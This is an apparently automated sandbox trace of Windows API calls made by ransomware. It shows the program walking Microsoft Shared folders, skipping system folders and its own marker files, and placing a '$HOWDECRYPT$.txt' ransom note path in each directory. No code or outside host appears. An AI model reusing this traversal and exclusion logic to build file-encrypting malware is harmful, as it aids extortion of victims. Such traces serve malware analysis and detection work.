RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3553b0 [0091.040] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1430) returned 0x3824f8 [0091.040] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.040] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.040] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\$HOWDECRYPT$.txt") returned 76 [0091.040] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\$HOWDECRYPT$.txt") returned 76 [0091.040] GetProcessHeap () returned 0x2c0000 [0091.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3775f8 [0091.040] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1438) returned 0x3824f8 [0091.041] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.041] lstrcmpiW (lpString1="TRANSLAT", lpString2="Windows") returned -1 [0091.041] lstrlenW (lpString="Windows") returned 7 [0091.041] lstrcmpiW (lpString1="TRANSLAT", lpString2="$Recycle.bin") returned 1 [0091.042] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.042] lstrcmpiW (lpString1="TRANSLAT", lpString2="System Volume Information") returned 1 [0091.042] lstrlenW (lpString="System Volume Information") returned 25 [0091.042] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT") returned 59 [0091.042] lstrcmpW (lpString1="TRANSLAT", lpString2=".") returned 1 [0091.042] lstrcmpW (lpString1="TRANSLAT", lpString2="..") returned 1 [0091.042] GetProcessHeap () returned 0x2c0000 [0091.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0091.042] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*") returned 61 [0091.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.079] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.079] lstrlenW (lpString="Windows") returned 7 [0091.079] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.079] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.079] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.079] lstrlenW (lpString="System Volume Information") returned 25 [0091.079] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\.") returned 61 [0091.079] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.079] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.079] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.079] lstrlenW (lpString="Windows") returned 7 [0091.079] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.079] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.079] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.079] lstrlenW (lpString="System Volume Information") returned 25 [0091.079] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\..") returned 62 [0091.079] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.079] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.080] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.080] lstrcmpiW (lpString1="ARFR", lpString2="Windows") returned -1 [0091.080] lstrlenW (lpString="Windows") returned 7 [0091.080] lstrcmpiW (lpString1="ARFR", lpString2="$Recycle.bin") returned 1 [0091.080] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.080] lstrcmpiW (lpString1="ARFR", lpString2="System Volume Information") returned -1 [0091.080] lstrlenW (lpString="System Volume Information") returned 25 [0091.080] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR") returned 64 [0091.080] lstrcmpW (lpString1="ARFR", lpString2=".") returned 1 [0091.080] lstrcmpW (lpString1="ARFR", lpString2="..") returned 1 [0091.080] GetProcessHeap () returned 0x2c0000 [0091.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.080] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*") returned 66 [0091.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.081] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.081] lstrlenW (lpString="Windows") returned 7 [0091.081] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.081] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.081] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.081] lstrlenW (lpString="System Volume Information") returned 25 [0091.081] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\.") returned 66 [0091.081] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.081] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.082] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.082] lstrlenW (lpString="Windows") returned 7 [0091.082] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.082] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.082] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.082] lstrlenW (lpString="System Volume Information") returned 25 [0091.082] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\..") returned 67 [0091.082] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.082] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.082] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.082] lstrcmpiW (lpString1="MSB1ARFR.ITS", lpString2="Windows") returned -1 [0091.082] lstrlenW (lpString="Windows") returned 7 [0091.082] lstrcmpiW (lpString1="MSB1ARFR.ITS", lpString2="$Recycle.bin") returned 1 [0091.082] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.082] lstrcmpiW (lpString1="MSB1ARFR.ITS", lpString2="System Volume Information") returned -1 [0091.082] lstrlenW (lpString="System Volume Information") returned 25 [0091.082] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS") returned 77 [0091.082] StrStrIW (lpFirst="MSB1ARFR.ITS", lpSrch=".spyhunter") returned 0x0 [0091.082] lstrcmpW (lpString1="MSB1ARFR.ITS", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.082] lstrcmpW (lpString1="MSB1ARFR.ITS", lpString2="_uninstalling_.png") returned 1 [0091.082] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS") returned 77 [0091.082] GetProcessHeap () returned 0x2c0000 [0091.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3775f8 [0091.082] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1430) returned 0x3824f8 [0091.082] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.082] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.083] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\$HOWDECRYPT$.txt") returned 81 [0091.083] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\$HOWDECRYPT$.txt") returned 81 [0091.083] GetProcessHeap () returned 0x2c0000 [0091.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x3414b0 [0091.083] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1438) returned 0x3824f8 [0091.083] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.083] lstrcmpiW (lpString1="ENES", lpString2="Windows") returned -1 [0091.083] lstrlenW (lpString="Windows") returned 7 [0091.083] lstrcmpiW (lpString1="ENES", lpString2="$Recycle.bin") returned 1 [0091.083] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.083] lstrcmpiW (lpString1="ENES", lpString2="System Volume Information") returned -1 [0091.083] lstrlenW (lpString="System Volume Information") returned 25 [0091.083] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES") returned 64 [0091.083] lstrcmpW (lpString1="ENES", lpString2=".") returned 1 [0091.083] lstrcmpW (lpString1="ENES", lpString2="..") returned 1 [0091.083] GetProcessHeap () returned 0x2c0000 [0091.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.083] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*") returned 66 [0091.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.084] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.084] lstrlenW (lpString="Windows") returned 7 [0091.084] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.084] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.084] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.084] lstrlenW (lpString="System Volume Information") returned 25 [0091.084] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\.") returned 66 [0091.084] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.085] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.085] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.085] lstrlenW (lpString="Windows") returned 7 [0091.085] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.085] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.085] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.085] lstrlenW (lpString="System Volume Information") returned 25 [0091.085] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\..") returned 67 [0091.085] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.085] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.085] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.085] lstrcmpiW (lpString1="MSB1ENES.ITS", lpString2="Windows") returned -1 [0091.085] lstrlenW (lpString="Windows") returned 7 [0091.085] lstrcmpiW (lpString1="MSB1ENES.ITS", lpString2="$Recycle.bin") returned 1 [0091.085] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.085] lstrcmpiW (lpString1="MSB1ENES.ITS", lpString2="System Volume Information") returned -1 [0091.085] lstrlenW (lpString="System Volume Information") returned 25 [0091.085] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS") returned 77 [0091.085] StrStrIW (lpFirst="MSB1ENES.ITS", lpSrch=".spyhunter") returned 0x0 [0091.086] lstrcmpW (lpString1="MSB1ENES.ITS", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.086] lstrcmpW (lpString1="MSB1ENES.ITS", lpString2="_uninstalling_.png") returned 1 [0091.086] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS") returned 77 [0091.086] GetProcessHeap () returned 0x2c0000 [0091.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3776e0 [0091.086] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1440) returned 0x3824f8 [0091.086] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.086] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.086] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\$HOWDECRYPT$.txt") returned 81 [0091.086] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\$HOWDECRYPT$.txt") returned 81 [0091.086] GetProcessHeap () returned 0x2c0000 [0091.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x342e00 [0091.086] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1448) returned 0x3824f8 [0091.086] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.086] lstrcmpiW (lpString1="ENFR", lpString2="Windows") returned -1 [0091.086] lstrlenW (lpString="Windows") returned 7 [0091.086] lstrcmpiW (lpString1="ENFR", lpString2="$Recycle.bin") returned 1 [0091.086] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.086] lstrcmpiW (lpString1="ENFR", lpString2="System Volume Information") returned -1 [0091.086] lstrlenW (lpString="System Volume Information") returned 25 [0091.086] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR") returned 64 [0091.086] lstrcmpW (lpString1="ENFR", lpString2=".") returned 1 [0091.086] lstrcmpW (lpString1="ENFR", lpString2="..") returned 1 [0091.086] GetProcessHeap () returned 0x2c0000 [0091.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.086] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*") returned 66 [0091.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.087] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.087] lstrlenW (lpString="Windows") returned 7 [0091.087] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.087] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.087] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.087] lstrlenW (lpString="System Volume Information") returned 25 [0091.087] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\.") returned 66 [0091.087] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.087] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.087] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.087] lstrlenW (lpString="Windows") returned 7 [0091.087] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.087] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.087] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.087] lstrlenW (lpString="System Volume Information") returned 25 [0091.087] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\..") returned 67 [0091.087] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.087] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.087] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.087] lstrcmpiW (lpString1="MSB1ENFR.ITS", lpString2="Windows") returned -1 [0091.087] lstrlenW (lpString="Windows") returned 7 [0091.087] lstrcmpiW (lpString1="MSB1ENFR.ITS", lpString2="$Recycle.bin") returned 1 [0091.087] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.088] lstrcmpiW (lpString1="MSB1ENFR.ITS", lpString2="System Volume Information") returned -1 [0091.088] lstrlenW (lpString="System Volume Information") returned 25 [0091.088] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS") returned 77 [0091.088] StrStrIW (lpFirst="MSB1ENFR.ITS", lpSrch=".spyhunter") returned 0x0 [0091.088] lstrcmpW (lpString1="MSB1ENFR.ITS", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.088] lstrcmpW (lpString1="MSB1ENFR.ITS", lpString2="_uninstalling_.png") returned 1 [0091.088] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS") returned 77 [0091.088] GetProcessHeap () returned 0x2c0000 [0091.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3777c8 [0091.088] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1450) returned 0x3824f8 [0091.088] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.088] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.088] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\$HOWDECRYPT$.txt") returned 81 [0091.088] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\$HOWDECRYPT$.txt") returned 81 [0091.088] GetProcessHeap () returned 0x2c0000 [0091.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x342ef0 [0091.088] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1458) returned 0x3824f8 [0091.088] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.088] lstrcmpiW (lpString1="ESEN", lpString2="Windows") returned -1 [0091.088] lstrlenW (lpString="Windows") returned 7 [0091.088] lstrcmpiW (lpString1="ESEN", lpString2="$Recycle.bin") returned 1 [0091.088] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.088] lstrcmpiW (lpString1="ESEN", lpString2="System Volume Information") returned -1 [0091.088] lstrlenW (lpString="System Volume Information") returned 25 [0091.088] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN") returned 64 [0091.088] lstrcmpW (lpString1="ESEN", lpString2=".") returned 1 [0091.089] lstrcmpW (lpString1="ESEN", lpString2="..") returned 1 [0091.089] GetProcessHeap () returned 0x2c0000 [0091.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.089] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*") returned 66 [0091.089] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.089] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.089] lstrlenW (lpString="Windows") returned 7 [0091.089] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.089] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.089] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.089] lstrlenW (lpString="System Volume Information") returned 25 [0091.089] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\.") returned 66 [0091.089] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.089] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.089] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.089] lstrlenW (lpString="Windows") returned 7 [0091.089] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.089] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.089] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.089] lstrlenW (lpString="System Volume Information") returned 25 [0091.089] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\..") returned 67 [0091.089] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.089] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.089] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.089] lstrcmpiW (lpString1="MSB1ESEN.DLL", lpString2="Windows") returned -1 [0091.089] lstrlenW (lpString="Windows") returned 7 [0091.090] lstrcmpiW (lpString1="MSB1ESEN.DLL", lpString2="$Recycle.bin") returned 1 [0091.090] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.090] lstrcmpiW (lpString1="MSB1ESEN.DLL", lpString2="System Volume Information") returned -1 [0091.090] lstrlenW (lpString="System Volume Information") returned 25 [0091.090] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL") returned 77 [0091.090] StrStrIW (lpFirst="MSB1ESEN.DLL", lpSrch=".spyhunter") returned 0x0 [0091.090] lstrcmpW (lpString1="MSB1ESEN.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.090] lstrcmpW (lpString1="MSB1ESEN.DLL", lpString2="_uninstalling_.png") returned 1 [0091.090] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL") returned 77 [0091.090] GetProcessHeap () returned 0x2c0000 [0091.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3778b0 [0091.090] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1460) returned 0x3824f8 [0091.090] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.090] lstrcmpiW (lpString1="MSB1ESEN.ITS", lpString2="Windows") returned -1 [0091.090] lstrlenW (lpString="Windows") returned 7 [0091.090] lstrcmpiW (lpString1="MSB1ESEN.ITS", lpString2="$Recycle.bin") returned 1 [0091.090] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.090] lstrcmpiW (lpString1="MSB1ESEN.ITS", lpString2="System Volume Information") returned -1 [0091.090] lstrlenW (lpString="System Volume Information") returned 25 [0091.090] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS") returned 77 [0091.090] StrStrIW (lpFirst="MSB1ESEN.ITS", lpSrch=".spyhunter") returned 0x0 [0091.090] lstrcmpW (lpString1="MSB1ESEN.ITS", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.090] lstrcmpW (lpString1="MSB1ESEN.ITS", lpString2="_uninstalling_.png") returned 1 [0091.090] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS") returned 77 [0091.090] GetProcessHeap () returned 0x2c0000 [0091.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377998 [0091.090] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1468) returned 0x3824f8 [0091.090] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.090] lstrcmpiW (lpString1="WT61ES.LEX", lpString2="Windows") returned 1 [0091.090] lstrlenW (lpString="Windows") returned 7 [0091.090] lstrcmpiW (lpString1="WT61ES.LEX", lpString2="$Recycle.bin") returned 1 [0091.091] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.091] lstrcmpiW (lpString1="WT61ES.LEX", lpString2="System Volume Information") returned 1 [0091.091] lstrlenW (lpString="System Volume Information") returned 25 [0091.091] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX") returned 75 [0091.091] StrStrIW (lpFirst="WT61ES.LEX", lpSrch=".spyhunter") returned 0x0 [0091.091] lstrcmpW (lpString1="WT61ES.LEX", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.091] lstrcmpW (lpString1="WT61ES.LEX", lpString2="_uninstalling_.png") returned 1 [0091.091] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX") returned 75 [0091.091] GetProcessHeap () returned 0x2c0000 [0091.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x3463a8 [0091.091] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1470) returned 0x3824f8 [0091.091] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.091] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.091] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\$HOWDECRYPT$.txt") returned 81 [0091.091] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\$HOWDECRYPT$.txt") returned 81 [0091.091] GetProcessHeap () returned 0x2c0000 [0091.091] RtlAllocateHeap 